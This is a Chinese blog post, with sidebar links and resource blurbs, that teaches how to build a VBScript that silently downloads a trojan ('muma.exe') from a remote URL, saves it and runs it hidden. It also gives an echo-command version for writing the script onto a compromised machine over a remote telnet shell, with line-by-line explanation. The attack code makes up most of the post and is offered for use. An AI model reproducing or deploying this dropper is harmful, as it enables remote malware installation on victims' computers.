- 浏览: 15864 次
最新评论
制作自动运行木马的vbs脚本
2010年05月17日
自动下载并运行的VBS脚本代码 转自二进制小组
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.***/muma.exe ",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "muma.exe",2
set ws=wscript.createobject("wscript.shell")
ws.run "muma.exe /start",0
把上面的代码复制到一个文档里.另存为**.vbs,然后运行**.vbs就相当于运行你的木马了.
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>c:\1.vbs
echo xPost.Open "GET","http://www.***/muma.exe",0 >>c:\1.vbs
echo xPost.Send() >>c:\1.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>c:\1.vbs
echo sGet.Mode = 3 >>c:\1.vbs
echo sGet.Type = 1 >>c:\1.vbs
echo sGet.Open() >>c:\1.vbs
echo sGet.Write(xPost.responseBody) >>c:\1.vbs
echo sGet.SaveToFile "muma.exe",2 >>c:\1.vbs
echo set ws=wscript.createobject("wscript.shell") >>c:\1.vbs
echo ws.run "muma.exe /start",0 >>c:\1.vbs
另外如果是远程Tenet的话就直接复制这段代码回车就可以在肉鸡上写一个1.VBS脚本了.
>>c:\1.vbs 的意思就是把代码写到肉鸡C盘下的1.vbs
xPost.Open "GET","http://www.***/muma.exe",0
这段代码的意思就是下载你的木马
sGet.SaveToFile "muma.exe",2
这段代码的意思是保存木马到当前目录下文件名为muma.exe
ws.run "muma.exe /start",0
这段代码的意思是运行muma.exe
大家可以用自己电脑试一下的,开始→运行→输入CMD→再输入上面的代码.看看你的C盘是不是多了一个1.vbs 右键编辑看看里面的内容是不是这段代码?
发表评论
-
vbs学习笔记
2012-01-20 10:00 584vbs学习笔记 2010年06月20日 刚解了下fso, ... -
vbs脚本:MoveFolder
2012-01-20 09:59 668vbs脚本:MoveFolder 2010年08月08日 ... -
分享一个单机游戏的NSIS封装包脚本代码
2012-01-20 09:58 818分享一个单机游戏的NSIS封装包脚本代码 2011年05月1 ... -
在windows系统中配置关机和开机执行脚本
2012-01-20 09:57 829在windows系统中配置关机和开机执行脚本 2010年09 ... -
QTP的2种脚本调用方法是什么
2012-01-20 09:57 685QTP的2种脚本调用方法是什么 2011年06月14日 ... -
C#面试题集锦(你值得拥有!)
2012-01-19 15:01 1202C#面试题集锦(你值得拥 ... -
ASP.Net考试复习资料
2012-01-19 15:01 815ASP.Net考试复习资料 2011 ... -
javascript:history.go()和History.back()的区别
2012-01-19 15:01 977javascript:history.go()和History ... -
2011-6-25
2012-01-19 15:01 8752011-6-25 2011年06月25日 (71)下列 ... -
3DMAX 300问 (五)
2012-01-17 04:46 8033DMAX 300问 (五) 2011年04月23日 6 ... -
机能强劲 疑为N3DS主机用GPU规格透露?
2012-01-17 04:46 710机能强劲 疑为N3DS主机用GPU规格透露? 2010年06 ... -
perfHUD使用说明
2012-01-17 04:46 750perfHUD使用说明 2011年04月14日 perf ... -
6.14.10.6999 (20090814) - ATI Mobility Radeon HD 4500 Series
2012-01-17 04:46 8376.14.10.6999 (20090814) - ATI M ... -
★市售手机CPU型号性能点评★
2012-01-17 04:46 1430★市售手机CPU型号性能点评★ 2011年02月14日 ... -
Adsutil.vbs在脚本入侵中的妙用
2012-01-16 03:38 733Adsutil.vbs在脚本入侵中的妙用 2011年03月0 ... -
vbs脚本文件执行提权技术技巧
2012-01-16 03:38 772vbs脚本文件执行提权技 ... -
vbs脚本实例
2012-01-16 03:38 664vbs脚本实例 2011年02月28日 rem 结束QQ ... -
利用VBS脚本让qq永远在线
2012-01-16 03:38 599利用VBS脚本让qq永远在线 2011年06月07日 让 ...
相关推荐
用于在服务端以命令行输入脚本,实现木马上传,不需要第三方软件,在没有ftp.exe和tftp.exe都被管理员删除的情况下很有用。
资源包里面是本人手写的七个脚本文件。可以用来和你的另一半在一起制造欢乐的气氛,只需要下载之后在电脑端双击运行即可。大家可以放心下载。没有木马病毒危害。大家要记得文件名喔,真的把你的另一半搞生气了我可...
1. 掌握VBS脚本语言的基本编程知识。 2. 掌握木马的植入和运行方式。 3. 掌握缓冲区溢出原理并编写缓冲区溢出程序。
很多单机游戏的存档是放在C盘的Documents、ProgramData或LocalLow目录,这个vbs脚本可以将目录链接到你的游戏所在路径,以后不管是重装系统还是拷贝游戏到其它电脑,直接运行一下这个脚本就可以了。 注意:使用软件...
要使用本软件请下载压缩包后解压至任意一文件夹,建议执行run.bat,防止病毒/木马对VBS文件关联的篡改以及wscript.exe被感染或替换,tools.exe也就是Windows\system32\wscript.exe大家可以比对下这两个文件是否一致...
#该脚本用于本地扫描ASP木马,速度比ASP版快很多。可能存在误报、漏报的情况,视具体情况处理 #用法: CScript Scan.vbs [扫描路径] [结果HTM文件路径] #例子: CScript Scan.vbs d:\Web d:\report.html -------------...
#该脚本用于本地扫描ASP木马,速度比ASP版快很多。可能存在误报、漏报的情况,视具体情况处理 #用法: CScript Scan.vbs [扫描路径] [结果HTM文件路径] #例子: CScript Scan.vbs d:\Web f:\my\report.html ----------...
以管理员身份运行该vbs脚本,可以禁止所有的应用程序对管理员权限的请求(重启或注销后失效),正常模式下就连杀毒软件和木马都无法请求管理员权限! 开源,无危险。 注意:当vbs脚本应用程序----wscript.exe被结束...
自己捣鼓了半天,终于写出了个脚本,实现flux在注册表中的启动,当然是更隐蔽的方法,别人知道了这个地方也就没戏了。
一. VBS脚本编程 二. 汇编病毒程序运行及调试 三. 木马植入运行的方式 编写缓冲区溢出程序 费尔防火墙的安装及配置 1、主机及端口扫描工具的使用 2、远程监控和管理工具的使用 3、采用C#加密API实现MD5 病毒及...
它可以将批处理文件(.bat)、Visual Basic和 Java脚本快速转换为可执行EXE 文件,同时可以保护.bat、.vbs 和 .js 的内容。 汉化说明: 1、此为汉化注册版,采用语言包形式,安装后即可使用。 2、如果以前使用过...
特别注意:以上exe可执行文件是将 VBScript 文件(*.vbs)通过强劲的Blowfish 加密算法编译成EXE形式的可执行文件,其行为类似木马借助该exe程序去启动QTP,执行时会被杀毒软件的木马防火墙误报为木马,需要将该执行...
禁止在C盘中新建任何VBS脚本文件 禁止访问TEMP文件夹,防止恶意安装程序 禁止在C盘中新建任何JS脚本文件 禁止在C盘中新建任何JSE脚本文件 禁止对Access数据库文件进行任何操作 禁止在C盘中新建任何VBE文件 禁止C盘中...
禁止scrrun.dll 禁止在C盘中新建任何批处理BAT文件 禁止在C盘中新建任何VBS脚本文件 禁止访问TEMP文件夹,防止恶意安装程序 禁止在C盘中新建任何JS脚本文件 禁止在C盘中新建任何JSE脚本文件...
它可以将批处理文件(.bat)、Visual Basic和 Java脚本快速转换为可执行EXE 文件,同时可以保护.bat、.vbs 和 .js 的内容。 汉化说明: 1、此为汉化注册版,采用语言包形式,安装后即可使用。 2、如果以前使用过英文版...
本程序通杀目前已知的加密或未加密的ASP ASPX PHP CGI JSP VBS 与 HTML恶意代码... 等脚本WebShell (主要针对ASP木马)查杀率百分之百.
K8信息安全工具包功能有: K8浏览器 K8木马病毒后门监视器 K8_VBS提权脚本免杀生成器 K8破壳SMTP K8正方密码解密工具 破文生成 搜索引擎 加密解密 在线翻译渗透命令 渗透工具 系统加强 网吧攻防 小红伞 漏洞 EXP ...